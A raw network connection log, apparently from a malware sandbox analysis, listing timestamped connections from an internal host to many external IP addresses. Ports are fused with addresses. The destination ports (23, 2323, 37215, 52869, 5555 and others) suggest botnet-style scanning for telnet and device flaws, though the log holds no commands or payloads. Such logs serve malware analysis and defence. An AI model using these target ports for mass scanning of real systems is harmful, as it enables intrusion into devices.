                                                                        Dec 6, 2024 00:37:18.471025944 CET533528080192.168.2.23158.47.178.116
                                                                        Dec 6, 2024 00:37:18.471050978 CET84435150675.31.1.154192.168.2.23
                                                                        Dec 6, 2024 00:37:18.471061945 CET5286937370104.167.229.114192.168.2.23
                                                                        Dec 6, 2024 00:37:18.471072912 CET75745164486.250.36.97192.168.2.23
                                                                        Dec 6, 2024 00:37:18.471085072 CET808035456180.201.171.91192.168.2.23
                                                                        Dec 6, 2024 00:37:18.471093893 CET808043438129.248.230.61192.168.2.23
                                                                        Dec 6, 2024 00:37:18.471096039 CET515068443192.168.2.2375.31.1.154
                                                                        Dec 6, 2024 00:37:18.471110106 CET3737052869192.168.2.23104.167.229.114
                                                                        Dec 6, 2024 00:37:18.471110106 CET516447574192.168.2.2386.250.36.97
                                                                        Dec 6, 2024 00:37:18.471168041 CET434388080192.168.2.23129.248.230.61
                                                                        Dec 6, 2024 00:37:18.471173048 CET354568080192.168.2.23180.201.171.91
                                                                        Dec 6, 2024 00:37:18.474443913 CET528694197824.69.76.39192.168.2.23
                                                                        Dec 6, 2024 00:37:18.474468946 CET804749837.42.125.130192.168.2.23
                                                                        Dec 6, 2024 00:37:18.474479914 CET8058016110.132.229.55192.168.2.23
                                                                        Dec 6, 2024 00:37:18.474488020 CET4197852869192.168.2.2324.69.76.39
                                                                        Dec 6, 2024 00:37:18.474513054 CET5801680192.168.2.23110.132.229.55
                                                                        Dec 6, 2024 00:37:18.474545002 CET4749880192.168.2.2337.42.125.130
                                                                        Dec 6, 2024 00:37:18.474551916 CET491523587252.19.192.27192.168.2.23
                                                                        Dec 6, 2024 00:37:18.474561930 CET805692227.135.40.206192.168.2.23
                                                                        Dec 6, 2024 00:37:18.474584103 CET8046438161.57.64.245192.168.2.23
                                                                        Dec 6, 2024 00:37:18.474589109 CET3587249152192.168.2.2352.19.192.27
                                                                        Dec 6, 2024 00:37:18.474592924 CET528695670035.182.130.14192.168.2.23
                                                                        Dec 6, 2024 00:37:18.474610090 CET757453608146.24.201.110192.168.2.23
                                                                        Dec 6, 2024 00:37:18.474618912 CET372155625280.140.236.37192.168.2.23
                                                                        Dec 6, 2024 00:37:18.474626064 CET5692280192.168.2.2327.135.40.206
                                                                        Dec 6, 2024 00:37:18.474630117 CET4643880192.168.2.23161.57.64.245
                                                                        Dec 6, 2024 00:37:18.474631071 CET5286955100160.235.41.246192.168.2.23
                                                                        Dec 6, 2024 00:37:18.474630117 CET5670052869192.168.2.2335.182.130.14
                                                                        Dec 6, 2024 00:37:18.474647999 CET536087574192.168.2.23146.24.201.110
                                                                        Dec 6, 2024 00:37:18.474663973 CET5625237215192.168.2.2380.140.236.37
                                                                        Dec 6, 2024 00:37:18.474663973 CET5510052869192.168.2.23160.235.41.246
                                                                        Dec 6, 2024 00:37:18.479705095 CET3721545382101.87.65.249192.168.2.23
                                                                        Dec 6, 2024 00:37:18.480087996 CET37215499284.37.49.168192.168.2.23
                                                                        Dec 6, 2024 00:37:18.481069088 CET3419837215192.168.2.2362.243.148.102
                                                                        Dec 6, 2024 00:37:18.481076002 CET5031880192.168.2.23140.36.171.144
                                                                        Dec 6, 2024 00:37:18.481076002 CET5738080192.168.2.2321.184.171.120
                                                                        Dec 6, 2024 00:37:18.481076002 CET564425555192.168.2.2357.50.122.128
                                                                        Dec 6, 2024 00:37:18.481081963 CET6004880192.168.2.23208.194.221.177
                                                                        Dec 6, 2024 00:37:18.481081963 CET548648080192.168.2.23108.2.38.147
                                                                        Dec 6, 2024 00:37:18.481082916 CET419707574192.168.2.2312.193.77.30
                                                                        Dec 6, 2024 00:37:18.481091976 CET602508080192.168.2.23168.86.194.195
                                                                        Dec 6, 2024 00:37:18.481105089 CET4475049152192.168.2.2365.116.117.240
                                                                        Dec 6, 2024 00:37:18.481105089 CET533067574192.168.2.2396.60.120.210
                                                                        Dec 6, 2024 00:37:18.481105089 CET5852680192.168.2.2335.206.252.44
                                                                        Dec 6, 2024 00:37:18.481106043 CET5513437215192.168.2.23203.42.1.200
                                                                        Dec 6, 2024 00:37:18.481106997 CET4519481192.168.2.23150.212.74.155
                                                                        Dec 6, 2024 00:37:18.481121063 CET423628080192.168.2.23219.123.46.82
                                                                        Dec 6, 2024 00:37:18.481121063 CET5356480192.168.2.2312.98.90.196
                                                                        Dec 6, 2024 00:37:18.481153011 CET512065555192.168.2.23222.159.109.176
                                                                        Dec 6, 2024 00:37:18.481154919 CET369348080192.168.2.232.186.161.198
                                                                        Dec 6, 2024 00:37:18.492412090 CET8057302111.190.5.136192.168.2.23
                                                                        Dec 6, 2024 00:37:18.492628098 CET4458080192.168.2.23215.21.207.199
                                                                        Dec 6, 2024 00:37:18.492651939 CET4461280192.168.2.23135.5.55.70
                                                                        Dec 6, 2024 00:37:18.492682934 CET4266080192.168.2.2347.122.83.230
                                                                        Dec 6, 2024 00:37:18.498606920 CET815608816.47.121.131192.168.2.23
                                                                        Dec 6, 2024 00:37:18.500365019 CET3721557870115.127.83.25192.168.2.23
                                                                        Dec 6, 2024 00:37:18.500375032 CET491523912831.143.91.200192.168.2.23
                                                                        Dec 6, 2024 00:37:18.500438929 CET4915253064215.52.243.147192.168.2.23
                                                                        Dec 6, 2024 00:37:18.505834103 CET8059038212.113.242.32192.168.2.23
                                                                        Dec 6, 2024 00:37:18.505844116 CET803478051.165.1.43192.168.2.23
                                                                        Dec 6, 2024 00:37:18.505853891 CET5555547701.43.165.215192.168.2.23
                                                                        Dec 6, 2024 00:37:18.505876064 CET5903880192.168.2.23212.113.242.32
                                                                        Dec 6, 2024 00:37:18.505877972 CET3478080192.168.2.2351.165.1.43
                                                                        Dec 6, 2024 00:37:18.505889893 CET547705555192.168.2.231.43.165.215
                                                                        Dec 6, 2024 00:37:18.510276079 CET4746480192.168.2.23118.10.156.24
                                                                        Dec 6, 2024 00:37:18.510318995 CET3657037215192.168.2.2334.209.161.32
                                                                        Dec 6, 2024 00:37:18.510719061 CET3346881192.168.2.2383.20.233.112
                                                                        Dec 6, 2024 00:37:18.510720015 CET527067574192.168.2.23119.70.198.71
                                                                        Dec 6, 2024 00:37:18.512957096 CET844360554140.238.101.15192.168.2.23
                                                                        Dec 6, 2024 00:37:18.521100998 CET8035770209.123.202.125192.168.2.23
                                                                        Dec 6, 2024 00:37:18.537863016 CET80804559848.100.225.20192.168.2.23
                                                                        Dec 6, 2024 00:37:18.537909031 CET455988080192.168.2.2348.100.225.20
                                                                        Dec 6, 2024 00:37:18.537911892 CET757435610194.236.130.103192.168.2.23
                                                                        Dec 6, 2024 00:37:18.537921906 CET75746035082.130.80.238192.168.2.23
                                                                        Dec 6, 2024 00:37:18.537957907 CET356107574192.168.2.23194.236.130.103
                                                                        Dec 6, 2024 00:37:18.537971973 CET603507574192.168.2.2382.130.80.238
                                                                        Dec 6, 2024 00:37:18.570396900 CET805570432.37.204.78192.168.2.23
                                                                        Dec 6, 2024 00:37:18.570430994 CET8050650112.164.49.42192.168.2.23
                                                                        Dec 6, 2024 00:37:18.570435047 CET5570480192.168.2.2332.37.204.78
                                                                        Dec 6, 2024 00:37:18.570442915 CET80805579211.95.223.196192.168.2.23
                                                                        Dec 6, 2024 00:37:18.570471048 CET5065080192.168.2.23112.164.49.42
                                                                        Dec 6, 2024 00:37:18.570471048 CET557928080192.168.2.2311.95.223.196
                                                                        Dec 6, 2024 00:37:18.602755070 CET372153419862.243.148.102192.168.2.23
                                                                        Dec 6, 2024 00:37:18.602766991 CET8050318140.36.171.144192.168.2.23
                                                                        Dec 6, 2024 00:37:18.602775097 CET805738021.184.171.120192.168.2.23
                                                                        Dec 6, 2024 00:37:18.602801085 CET3419837215192.168.2.2362.243.148.102
                                                                        Dec 6, 2024 00:37:18.602814913 CET5031880192.168.2.23140.36.171.144
                                                                        Dec 6, 2024 00:37:18.602817059 CET5738080192.168.2.2321.184.171.120
                                                                        Dec 6, 2024 00:37:18.613289118 CET8044580215.21.207.199192.168.2.23
                                                                        Dec 6, 2024 00:37:18.613300085 CET8044612135.5.55.70192.168.2.23
                                                                        Dec 6, 2024 00:37:18.613312960 CET804266047.122.83.230192.168.2.23
                                                                        Dec 6, 2024 00:37:18.618408918 CET5510052869192.168.2.23160.235.41.246
                                                                        Dec 6, 2024 00:37:18.619172096 CET536087574192.168.2.23146.24.201.110
                                                                        Dec 6, 2024 00:37:18.619539976 CET3587249152192.168.2.2352.19.192.27
                                                                        Dec 6, 2024 00:37:18.619597912 CET5692280192.168.2.2327.135.40.206
                                                                        Dec 6, 2024 00:37:18.619600058 CET5625237215192.168.2.2380.140.236.37
                                                                        Dec 6, 2024 00:37:18.619646072 CET4197852869192.168.2.2324.69.76.39
                                                                        Dec 6, 2024 00:37:18.619647980 CET5670052869192.168.2.2335.182.130.14
                                                                        Dec 6, 2024 00:37:18.619668007 CET434388080192.168.2.23129.248.230.61
                                                                        Dec 6, 2024 00:37:18.619723082 CET4749880192.168.2.2337.42.125.130
                                                                        Dec 6, 2024 00:37:18.619725943 CET4643880192.168.2.23161.57.64.245
                                                                        Dec 6, 2024 00:37:18.620100021 CET5801680192.168.2.23110.132.229.55
                                                                        Dec 6, 2024 00:37:18.620142937 CET3737052869192.168.2.23104.167.229.114
                                                                        Dec 6, 2024 00:37:18.620153904 CET516447574192.168.2.2386.250.36.97
                                                                        Dec 6, 2024 00:37:18.620193958 CET515068443192.168.2.2375.31.1.154
                                                                        Dec 6, 2024 00:37:18.620201111 CET354568080192.168.2.23180.201.171.91
                                                                        Dec 6, 2024 00:37:18.620604038 CET533528080192.168.2.23158.47.178.116
                                                                        Dec 6, 2024 00:37:18.627150059 CET3478080192.168.2.2351.165.1.43
                                                                        Dec 6, 2024 00:37:18.627501965 CET5903880192.168.2.23212.113.242.32
                                                                        Dec 6, 2024 00:37:18.627868891 CET547705555192.168.2.231.43.165.215
                                                                        Dec 6, 2024 00:37:18.631124973 CET8047464118.10.156.24192.168.2.23
                                                                        Dec 6, 2024 00:37:18.631165981 CET372153657034.209.161.32192.168.2.23
                                                                        Dec 6, 2024 00:37:18.631912947 CET757452706119.70.198.71192.168.2.23
                                                                        Dec 6, 2024 00:37:18.631933928 CET813346883.20.233.112192.168.2.23
                                                                        Dec 6, 2024 00:37:18.741214037 CET455988080192.168.2.2348.100.225.20
                                                                        Dec 6, 2024 00:37:18.741255999 CET356107574192.168.2.23194.236.130.103
                                                                        Dec 6, 2024 00:37:18.741255999 CET603507574192.168.2.2382.130.80.238
                                                                        Dec 6, 2024 00:37:18.742269039 CET5286955100160.235.41.246192.168.2.23
                                                                        Dec 6, 2024 00:37:18.742309093 CET757453608146.24.201.110192.168.2.23
                                                                        Dec 6, 2024 00:37:18.742439032 CET491523587252.19.192.27192.168.2.23
                                                                        Dec 6, 2024 00:37:18.742451906 CET805692227.135.40.206192.168.2.23
                                                                        Dec 6, 2024 00:37:18.742461920 CET372155625280.140.236.37192.168.2.23
                                                                        Dec 6, 2024 00:37:18.742562056 CET528695670035.182.130.14192.168.2.23
                                                                        Dec 6, 2024 00:37:18.742572069 CET528694197824.69.76.39192.168.2.23
                                                                        Dec 6, 2024 00:37:18.742643118 CET808043438129.248.230.61192.168.2.23
                                                                        Dec 6, 2024 00:37:18.742654085 CET8046438161.57.64.245192.168.2.23
                                                                        Dec 6, 2024 00:37:18.742662907 CET804749837.42.125.130192.168.2.23
                                                                        Dec 6, 2024 00:37:18.742682934 CET8058016110.132.229.55192.168.2.23
                                                                        Dec 6, 2024 00:37:18.742743969 CET5286937370104.167.229.114192.168.2.23
                                                                        Dec 6, 2024 00:37:18.742758989 CET75745164486.250.36.97192.168.2.23
                                                                        Dec 6, 2024 00:37:18.742872953 CET84435150675.31.1.154192.168.2.23
                                                                        Dec 6, 2024 00:37:18.742892981 CET808035456180.201.171.91192.168.2.23
                                                                        Dec 6, 2024 00:37:18.742903948 CET808053352158.47.178.116192.168.2.23
                                                                        Dec 6, 2024 00:37:18.744856119 CET803478051.165.1.43192.168.2.23
                                                                        Dec 6, 2024 00:37:18.744874001 CET8059038212.113.242.32192.168.2.23
                                                                        Dec 6, 2024 00:37:18.744891882 CET5555547701.43.165.215192.168.2.23
                                                                        Dec 6, 2024 00:37:18.747847080 CET557928080192.168.2.2311.95.223.196
                                                                        Dec 6, 2024 00:37:18.748214960 CET5570480192.168.2.2332.37.204.78
                                                                        Dec 6, 2024 00:37:18.748939991 CET5065080192.168.2.23112.164.49.42
                                                                        Dec 6, 2024 00:37:18.755487919 CET5031880192.168.2.23140.36.171.144
                                                                        Dec 6, 2024 00:37:18.755866051 CET3419837215192.168.2.2362.243.148.102
                                                                        Dec 6, 2024 00:37:18.755880117 CET5738080192.168.2.2321.184.171.120
                                                                        Dec 6, 2024 00:37:18.860666037 CET570708080192.168.2.2321.26.38.64
                                                                        Dec 6, 2024 00:37:18.863248110 CET80804559848.100.225.20192.168.2.23
                                                                        Dec 6, 2024 00:37:18.863272905 CET757435610194.236.130.103192.168.2.23
                                                                        Dec 6, 2024 00:37:18.863282919 CET75746035082.130.80.238192.168.2.23
                                                                        Dec 6, 2024 00:37:18.867194891 CET80805579211.95.223.196192.168.2.23
                                                                        Dec 6, 2024 00:37:18.870454073 CET805570432.37.204.78192.168.2.23
                                                                        Dec 6, 2024 00:37:18.870491028 CET8050650112.164.49.42192.168.2.23
                                                                        Dec 6, 2024 00:37:18.871721029 CET8050318140.36.171.144192.168.2.23
                                                                        Dec 6, 2024 00:37:18.872335911 CET372153419862.243.148.102192.168.2.23
                                                                        Dec 6, 2024 00:37:18.876349926 CET805738021.184.171.120192.168.2.23
                                                                        Dec 6, 2024 00:37:18.886818886 CET419731023192.168.2.2376.121.105.77
                                                                        Dec 6, 2024 00:37:18.886818886 CET4197323192.168.2.23144.38.31.19
                                                                        Dec 6, 2024 00:37:18.886830091 CET4197323192.168.2.2381.177.15.220
                                                                        Dec 6, 2024 00:37:18.886852026 CET4197323192.168.2.2374.2.174.64
                                                                        Dec 6, 2024 00:37:18.886852980 CET4197323192.168.2.2373.218.2.134
                                                                        Dec 6, 2024 00:37:18.886856079 CET4197323192.168.2.23178.220.233.48
                                                                        Dec 6, 2024 00:37:18.886858940 CET4197323192.168.2.23170.105.57.176
                                                                        Dec 6, 2024 00:37:18.886858940 CET4197323192.168.2.2362.243.83.3
                                                                        Dec 6, 2024 00:37:18.886859894 CET4197323192.168.2.23143.238.131.39
                                                                        Dec 6, 2024 00:37:18.886864901 CET4197323192.168.2.23195.9.71.145
                                                                        Dec 6, 2024 00:37:18.886864901 CET419732323192.168.2.231.45.164.170
                                                                        Dec 6, 2024 00:37:18.886864901 CET4197323192.168.2.23162.149.234.92
                                                                        Dec 6, 2024 00:37:18.886881113 CET4197323192.168.2.23212.133.3.60
                                                                        Dec 6, 2024 00:37:18.886882067 CET4197323192.168.2.23193.238.116.34
                                                                        Dec 6, 2024 00:37:18.886887074 CET4197323192.168.2.23149.54.249.247
                                                                        Dec 6, 2024 00:37:18.886893034 CET4197323192.168.2.2341.6.121.118
                                                                        Dec 6, 2024 00:37:18.886897087 CET4197323192.168.2.23114.139.86.163
                                                                        Dec 6, 2024 00:37:18.886908054 CET4197323192.168.2.2363.126.45.225
                                                                        Dec 6, 2024 00:37:18.886908054 CET4197323192.168.2.23212.112.238.228
                                                                        Dec 6, 2024 00:37:18.886917114 CET4197323192.168.2.23110.227.23.91
                                                                        Dec 6, 2024 00:37:18.886919022 CET419732323192.168.2.23178.86.118.35
                                                                        Dec 6, 2024 00:37:18.886951923 CET4197323192.168.2.23182.113.115.246
                                                                        Dec 6, 2024 00:37:18.886960030 CET4197323192.168.2.23195.168.211.187
                                                                        Dec 6, 2024 00:37:18.886960983 CET4197323192.168.2.23110.23.60.87
                                                                        Dec 6, 2024 00:37:18.886965036 CET4197323192.168.2.23133.238.219.88
                                                                        Dec 6, 2024 00:37:18.886970997 CET4197323192.168.2.239.141.149.163
                                                                        Dec 6, 2024 00:37:18.886970997 CET4197323192.168.2.23153.38.49.158
                                                                        Dec 6, 2024 00:37:18.886987925 CET4197323192.168.2.23163.1.117.117
                                                                        Dec 6, 2024 00:37:18.886990070 CET419732323192.168.2.2399.233.51.182
                                                                        Dec 6, 2024 00:37:18.886996031 CET4197323192.168.2.23115.8.198.248
                                                                        Dec 6, 2024 00:37:18.886996031 CET4197323192.168.2.23162.215.88.247
                                                                        Dec 6, 2024 00:37:18.887000084 CET4197323192.168.2.23159.152.77.215
                                                                        Dec 6, 2024 00:37:18.887000084 CET4197323192.168.2.23177.77.48.119
                                                                        Dec 6, 2024 00:37:18.887006044 CET4197323192.168.2.23186.163.171.114
                                                                        Dec 6, 2024 00:37:18.887025118 CET4197323192.168.2.23125.14.40.77
                                                                        Dec 6, 2024 00:37:18.887036085 CET4197323192.168.2.23196.20.222.124
                                                                        Dec 6, 2024 00:37:18.887036085 CET4197323192.168.2.23170.136.187.243
                                                                        Dec 6, 2024 00:37:18.887036085 CET4197323192.168.2.23114.229.51.147
                                                                        Dec 6, 2024 00:37:18.887051105 CET4197323192.168.2.23194.130.241.189
                                                                        Dec 6, 2024 00:37:18.887053013 CET419732323192.168.2.2318.166.109.5
                                                                        Dec 6, 2024 00:37:18.887061119 CET4197323192.168.2.2364.64.187.163
                                                                        Dec 6, 2024 00:37:18.887063026 CET4197323192.168.2.23185.1.97.12
                                                                        Dec 6, 2024 00:37:18.887064934 CET4197323192.168.2.2394.127.13.142
                                                                        Dec 6, 2024 00:37:18.887072086 CET4197323192.168.2.23183.187.71.51
                                                                        Dec 6, 2024 00:37:18.887074947 CET4197323192.168.2.2319.120.198.77
                                                                        Dec 6, 2024 00:37:18.887082100 CET4197323192.168.2.23144.50.12.114
                                                                        Dec 6, 2024 00:37:18.887084961 CET4197323192.168.2.23101.82.123.23
                                                                        Dec 6, 2024 00:37:18.887089014 CET4197323192.168.2.2317.220.130.189
                                                                        Dec 6, 2024 00:37:18.887089968 CET4197323192.168.2.2345.133.120.4
                                                                        Dec 6, 2024 00:37:18.887089968 CET419732323192.168.2.23159.29.69.93
                                                                        Dec 6, 2024 00:37:18.887115002 CET4197323192.168.2.2331.244.199.242
                                                                        Dec 6, 2024 00:37:18.887115002 CET4197323192.168.2.2391.63.240.212
                                                                        Dec 6, 2024 00:37:18.887115002 CET4197323192.168.2.2378.52.213.74
                                                                        Dec 6, 2024 00:37:18.887116909 CET4197323192.168.2.23200.212.225.132
                                                                        Dec 6, 2024 00:37:18.887118101 CET4197323192.168.2.23133.115.78.19
                                                                        Dec 6, 2024 00:37:18.887134075 CET4197323192.168.2.23160.199.142.185
                                                                        Dec 6, 2024 00:37:18.887135029 CET4197323192.168.2.2354.95.204.4
                                                                        Dec 6, 2024 00:37:18.887135029 CET4197323192.168.2.23209.123.21.63
                                                                        Dec 6, 2024 00:37:18.887155056 CET4197323192.168.2.23142.237.4.51
                                                                        Dec 6, 2024 00:37:18.887156010 CET4197323192.168.2.2366.143.206.248
                                                                        Dec 6, 2024 00:37:18.887183905 CET4197323192.168.2.23116.97.112.15
                                                                        Dec 6, 2024 00:37:18.887186050 CET4197323192.168.2.2380.60.93.47
                                                                        Dec 6, 2024 00:37:18.887186050 CET4197323192.168.2.2312.20.27.108
                                                                        Dec 6, 2024 00:37:18.887192965 CET419732323192.168.2.2378.44.1.0
                                                                        Dec 6, 2024 00:37:18.887192965 CET4197323192.168.2.234.54.164.119
                                                                        Dec 6, 2024 00:37:18.887192965 CET4197323192.168.2.23133.180.8.203
                                                                        Dec 6, 2024 00:37:18.887198925 CET4197323192.168.2.23195.241.158.3
                                                                        Dec 6, 2024 00:37:18.887202978 CET4197323192.168.2.2398.167.136.50
                                                                        Dec 6, 2024 00:37:18.887202978 CET4197323192.168.2.2339.56.160.203
                                                                        Dec 6, 2024 00:37:18.887207031 CET419732323192.168.2.23178.75.16.84
                                                                        Dec 6, 2024 00:37:18.887218952 CET4197323192.168.2.2369.29.71.208
                                                                        Dec 6, 2024 00:37:18.887223959 CET4197323192.168.2.2360.141.189.65
                                                                        Dec 6, 2024 00:37:18.887224913 CET4197323192.168.2.23196.185.153.75
                                                                        Dec 6, 2024 00:37:18.887226105 CET4197323192.168.2.23108.11.99.70
                                                                        Dec 6, 2024 00:37:18.887237072 CET4197323192.168.2.2339.138.126.176
                                                                        Dec 6, 2024 00:37:18.887254000 CET4197323192.168.2.2397.27.149.127
                                                                        Dec 6, 2024 00:37:18.887260914 CET4197323192.168.2.23213.3.172.72
                                                                        Dec 6, 2024 00:37:18.887260914 CET4197323192.168.2.2379.134.46.17
                                                                        Dec 6, 2024 00:37:18.887263060 CET4197323192.168.2.23213.134.34.80
                                                                        Dec 6, 2024 00:37:18.887279987 CET419732323192.168.2.2341.178.169.79
                                                                        Dec 6, 2024 00:37:18.887280941 CET4197323192.168.2.23207.251.181.243
                                                                        Dec 6, 2024 00:37:18.887296915 CET4197323192.168.2.234.232.225.194
                                                                        Dec 6, 2024 00:37:18.887300968 CET4197323192.168.2.23110.127.207.146
                                                                        Dec 6, 2024 00:37:18.887301922 CET4197323192.168.2.2369.71.23.42
                                                                        Dec 6, 2024 00:37:18.887304068 CET4197323192.168.2.2357.92.87.139
                                                                        Dec 6, 2024 00:37:18.887300968 CET4197323192.168.2.23197.112.184.54
                                                                        Dec 6, 2024 00:37:18.887300968 CET4197323192.168.2.2368.34.73.37
                                                                        Dec 6, 2024 00:37:18.887300968 CET4197323192.168.2.2323.115.229.190
                                                                        Dec 6, 2024 00:37:18.887326956 CET4197323192.168.2.23115.54.199.61
                                                                        Dec 6, 2024 00:37:18.887331009 CET419732323192.168.2.2320.221.143.53
                                                                        Dec 6, 2024 00:37:18.887331009 CET4197323192.168.2.23201.89.118.227
                                                                        Dec 6, 2024 00:37:18.887346983 CET4197323192.168.2.23185.169.47.66
                                                                        Dec 6, 2024 00:37:18.887353897 CET4197323192.168.2.2313.19.78.90
                                                                        Dec 6, 2024 00:37:18.887356997 CET4197323192.168.2.2365.67.49.99
                                                                        Dec 6, 2024 00:37:18.887356997 CET4197323192.168.2.2385.126.190.157
                                                                        Dec 6, 2024 00:37:18.887362957 CET4197323192.168.2.23202.221.52.91
                                                                        Dec 6, 2024 00:37:18.887377977 CET4197323192.168.2.2312.106.255.35
                                                                        Dec 6, 2024 00:37:18.887381077 CET4197323192.168.2.23217.5.230.218
                                                                        Dec 6, 2024 00:37:18.887382030 CET4197323192.168.2.2343.174.241.183
                                                                        Dec 6, 2024 00:37:18.887386084 CET419732323192.168.2.232.216.36.66
                                                                        Dec 6, 2024 00:37:18.887386084 CET4197323192.168.2.23208.35.28.195
                                                                        Dec 6, 2024 00:37:18.887391090 CET4197323192.168.2.23208.233.137.184
                                                                        Dec 6, 2024 00:37:18.887396097 CET4197323192.168.2.23110.250.41.221
                                                                        Dec 6, 2024 00:37:18.887407064 CET4197323192.168.2.2367.141.2.182
                                                                        Dec 6, 2024 00:37:18.887407064 CET4197323192.168.2.23145.205.128.35
                                                                        Dec 6, 2024 00:37:18.887412071 CET4197323192.168.2.23210.225.46.171
                                                                        Dec 6, 2024 00:37:18.887424946 CET4197323192.168.2.23163.167.170.40
                                                                        Dec 6, 2024 00:37:18.887428045 CET4197323192.168.2.23182.51.25.83
                                                                        Dec 6, 2024 00:37:18.887428999 CET419732323192.168.2.23220.232.75.224
                                                                        Dec 6, 2024 00:37:18.887437105 CET4197323192.168.2.23129.5.38.236
                                                                        Dec 6, 2024 00:37:18.887449026 CET4197323192.168.2.23156.137.9.80
                                                                        Dec 6, 2024 00:37:18.887449026 CET4197323192.168.2.23207.66.227.85
                                                                        Dec 6, 2024 00:37:18.887476921 CET4197323192.168.2.23206.122.86.127
                                                                        Dec 6, 2024 00:37:18.887476921 CET4197323192.168.2.23159.241.254.167
                                                                        Dec 6, 2024 00:37:18.887481928 CET4197323192.168.2.2377.212.138.10
                                                                        Dec 6, 2024 00:37:18.887481928 CET4197323192.168.2.23204.227.143.52
                                                                        Dec 6, 2024 00:37:18.887481928 CET4197323192.168.2.23140.249.237.226
                                                                        Dec 6, 2024 00:37:18.887490034 CET419732323192.168.2.2385.38.195.121
                                                                        Dec 6, 2024 00:37:18.887496948 CET419731023192.168.2.23104.210.161.114
                                                                        Dec 6, 2024 00:37:18.887502909 CET4197323192.168.2.2367.214.86.129
                                                                        Dec 6, 2024 00:37:18.887502909 CET4197323192.168.2.23191.213.20.206
                                                                        Dec 6, 2024 00:37:18.887505054 CET4197323192.168.2.23122.241.202.182
                                                                        Dec 6, 2024 00:37:18.887506962 CET4197323192.168.2.23150.55.142.99
                                                                        Dec 6, 2024 00:37:18.887516975 CET4197323192.168.2.23187.171.47.140
                                                                        Dec 6, 2024 00:37:18.887516975 CET4197323192.168.2.23203.233.210.19
                                                                        Dec 6, 2024 00:37:18.887531996 CET4197323192.168.2.23177.26.187.41
                                                                        Dec 6, 2024 00:37:18.887537956 CET4197323192.168.2.2312.184.125.213
                                                                        Dec 6, 2024 00:37:18.887550116 CET4197323192.168.2.2378.14.128.172
                                                                        Dec 6, 2024 00:37:18.887553930 CET4197323192.168.2.23198.139.27.200
                                                                        Dec 6, 2024 00:37:18.887554884 CET4197323192.168.2.23103.234.183.123
                                                                        Dec 6, 2024 00:37:18.887556076 CET419732323192.168.2.23162.30.91.64
                                                                        Dec 6, 2024 00:37:18.887581110 CET4197323192.168.2.23180.191.16.81
                                                                        Dec 6, 2024 00:37:18.887586117 CET4197323192.168.2.23199.33.97.200
                                                                        Dec 6, 2024 00:37:18.887597084 CET4197323192.168.2.23190.67.60.229
                                                                        Dec 6, 2024 00:37:18.887597084 CET4197323192.168.2.2372.179.27.87
                                                                        Dec 6, 2024 00:37:18.887597084 CET419732323192.168.2.23187.35.46.241
                                                                        Dec 6, 2024 00:37:18.887599945 CET4197323192.168.2.239.35.147.55
                                                                        Dec 6, 2024 00:37:18.887603998 CET4197323192.168.2.23150.227.111.186
                                                                        Dec 6, 2024 00:37:18.887620926 CET4197323192.168.2.23195.230.200.83
                                                                        Dec 6, 2024 00:37:18.887628078 CET4197323192.168.2.23108.42.220.32
                                                                        Dec 6, 2024 00:37:18.887628078 CET4197323192.168.2.23179.73.76.92
                                                                        Dec 6, 2024 00:37:18.887634993 CET4197323192.168.2.23219.9.76.183
                                                                        Dec 6, 2024 00:37:18.887639999 CET4197323192.168.2.2341.133.187.227
                                                                        Dec 6, 2024 00:37:18.887639999 CET4197323192.168.2.23175.134.121.59
                                                                        Dec 6, 2024 00:37:18.887655020 CET4197323192.168.2.23202.107.98.214
                                                                        Dec 6, 2024 00:37:18.887655020 CET4197323192.168.2.2386.202.16.74
                                                                        Dec 6, 2024 00:37:18.887660027 CET4197323192.168.2.2399.23.39.4
                                                                        Dec 6, 2024 00:37:18.887660980 CET419732323192.168.2.232.93.178.116
                                                                        Dec 6, 2024 00:37:18.887677908 CET4197323192.168.2.23188.35.240.170
                                                                        Dec 6, 2024 00:37:18.887684107 CET4197323192.168.2.238.212.102.250
                                                                        Dec 6, 2024 00:37:18.887686014 CET4197323192.168.2.23178.19.184.121
                                                                        Dec 6, 2024 00:37:18.887686014 CET4197323192.168.2.2319.187.40.69
                                                                        Dec 6, 2024 00:37:18.887689114 CET4197323192.168.2.2385.196.228.141
                                                                        Dec 6, 2024 00:37:18.887691975 CET4197323192.168.2.23221.101.248.17
                                                                        Dec 6, 2024 00:37:18.887705088 CET4197323192.168.2.23222.12.127.73
                                                                        Dec 6, 2024 00:37:18.887710094 CET4197323192.168.2.23168.130.241.11
                                                                        Dec 6, 2024 00:37:18.887710094 CET4197323192.168.2.23216.109.63.143
                                                                        Dec 6, 2024 00:37:18.894687891 CET586745555192.168.2.23161.171.33.41
                                                                        Dec 6, 2024 00:37:18.970560074 CET5679081192.168.2.23162.216.243.236
                                                                        Dec 6, 2024 00:37:19.003108978 CET10234197376.121.105.77192.168.2.23
                                                                        Dec 6, 2024 00:37:19.003209114 CET419731023192.168.2.2376.121.105.77
                                                                        Dec 6, 2024 00:37:19.005880117 CET234197381.177.15.220192.168.2.23
                                                                        Dec 6, 2024 00:37:19.005889893 CET2341973144.38.31.19192.168.2.23
                                                                        Dec 6, 2024 00:37:19.005925894 CET4197323192.168.2.2381.177.15.220
                                                                        Dec 6, 2024 00:37:19.005951881 CET4197323192.168.2.23144.38.31.19
                                                                        Dec 6, 2024 00:37:19.009164095 CET234197374.2.174.64192.168.2.23
                                                                        Dec 6, 2024 00:37:19.009181976 CET234197373.218.2.134192.168.2.23
                                                                        Dec 6, 2024 00:37:19.009191990 CET2341973143.238.131.39192.168.2.23
                                                                        Dec 6, 2024 00:37:19.009205103 CET4197323192.168.2.2374.2.174.64
                                                                        Dec 6, 2024 00:37:19.009208918 CET2341973178.220.233.48192.168.2.23
                                                                        Dec 6, 2024 00:37:19.009222031 CET2341973195.9.71.145192.168.2.23
                                                                        Dec 6, 2024 00:37:19.009222031 CET4197323192.168.2.2373.218.2.134
                                                                        Dec 6, 2024 00:37:19.009238958 CET2323419731.45.164.170192.168.2.23
                                                                        Dec 6, 2024 00:37:19.009239912 CET4197323192.168.2.23143.238.131.39
                                                                        Dec 6, 2024 00:37:19.009279013 CET419732323192.168.2.231.45.164.170
                                                                        Dec 6, 2024 00:37:19.009280920 CET4197323192.168.2.23195.9.71.145
                                                                        Dec 6, 2024 00:37:19.009284019 CET4197323192.168.2.23178.220.233.48
                                                                        Dec 6, 2024 00:37:19.009330988 CET2341973162.149.234.92192.168.2.23
                                                                        Dec 6, 2024 00:37:19.009345055 CET2341973170.105.57.176192.168.2.23
                                                                        Dec 6, 2024 00:37:19.009363890 CET234197362.243.83.3192.168.2.23
                                                                        Dec 6, 2024 00:37:19.009367943 CET4197323192.168.2.23162.149.234.92
